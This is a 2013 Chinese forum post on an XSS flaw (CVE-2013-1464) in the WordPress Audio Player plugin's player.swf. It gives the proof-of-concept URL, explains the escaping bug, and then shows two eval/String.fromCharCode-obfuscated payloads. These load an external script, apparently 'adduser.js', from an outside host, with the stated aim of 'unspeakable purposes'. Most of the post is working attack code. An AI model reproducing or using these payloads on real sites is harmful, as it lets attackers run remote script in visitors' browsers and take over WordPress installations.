找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1040|回复: 0

js文件中调用js文件

[复制链接]

29

主题

-4

回帖

117

牛毛

一级牛人

积分
117
发表于 2013-4-16 15:36:46 | 显示全部楼层 |阅读模式 来自 上海市
在[CVE-2013-1464]WordPress Audio Player Plugin XSS in SWF

POC:

/wp-content/plugins/audio-player/assets/player.swf?playerID=a\”))}catch(e){alert(1)}//

查看player.swf :

if (flash.external.ExternalInterface.available) {

2                flash.external.ExternalInterface.addCallback("load", Application, ei_loadFile);

3                flash.external.ExternalInterface.addCallback("close", Application, ei_closePlayer);

4                flash.external.ExternalInterface.addCallback("open", Application, ei_openPlayer);

5                flash.external.ExternalInterface.addCallback("setVolume", Application, ei_setVolume);

6                flash.external.ExternalInterface.addCallback("addListener", Application, addJSListener);

7                flash.external.ExternalInterface.addCallback("removeListener", Application, removeJSListener);

8                var _local2 = Number(flash.external.ExternalInterface.call("AudioPlayer.getVolume", _options.playerID));



setInterval(_update, 100);

2            if (flash.external.ExternalInterface.available) {

3                flash.external.ExternalInterface.call("onWPPlayerReady", _options.playerID);

4            }

重点是每个代码最后含有playerID的一行。

因为外部的html的javascript中并没有存在AudioPlayer.getVolume和onWPPlayerReady函数,所以会默认进入try…catch中(浏览器默认功能)

在IE9/10中调试查看

view source1 try { __flash__toXML(AudioPlayer.getVolume("a\\"))}catch(e){alert(1)}//")) ; } catch (e) { "<undefined/>"; }

可以看出\”中  的双引号被转义为\”,这样\”就被转义为\\”,双引号起作用,达到了闭合的效果。然后补充catch模块,并注释掉其它,一个XSS就诞生了……所以,这里其实是flash本身的一个功能缺陷。flash并没有把’\'这个符号进行转义。

但,因为现在可控的都在javascript代码中。现在要引用外部js来达到不可告人的目的,这里就出了问题……因为利用js重新页面竟然没有成功……不知道还有什么办法引用并调用外部js么……

把这过程积累的引用外部js写出来,因为其中不能再出现” ,即双引号,所以用String.fromCharCode来转换,再结合eval执行。

方法一

转换前

view source1 eval("new_element=document.createElement("script"); new_element.setAttribute("type","text/javascript"); new_element.setAttribute("src","http://www.abc.com/share/adduser.js"); document.body.appendChild(new_element);");

转换后

eval(String.fromCharCode(34,110,101,119,95,101,108,101,109,101,110,116,61,100,111,99,117,109,101,110,116,46,99,
114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,32,
110,101,119,95,101,108,101,109,101,110,116,46,115,101,116,65,116,116,114,105,98,117,116,
101,40,34,116,121,112,101,34,44,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,
116,34,41,59,32,110,101,119,95,101,108,101,109,101,110,116,46,115,101,116,65,116,116,114,
105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,119,119,119,46,97,
98,99,46,99,111,109,47,115,104,97,114,101,47,97,100,100,117,115,101,114,46,106,115,34,41,
59,32,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,
105,108,100,40,110,101,119,95,101,108,101,109,101,110,116,41,59,34));

方法二

转换前:

view source1 eval("document.write('<script src=\"http://www.abc.com/share/adduser.js\"></script\>')");

转换后:

eval(String.fromCharCode(34,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,
115,114,99,61,92,34,104,116,116,112,58,47,47,119,119,119,46,97,98,99,46,99,111,109,47,115,104,97,
114,101,47,97,100,100,117,115,101,114,46,106,115,92,34,62,60,47,115,99,114,105,112,116,92,62,
39,41,34));

您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-27 20:03 , Processed in 0.241334 second(s), 33 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表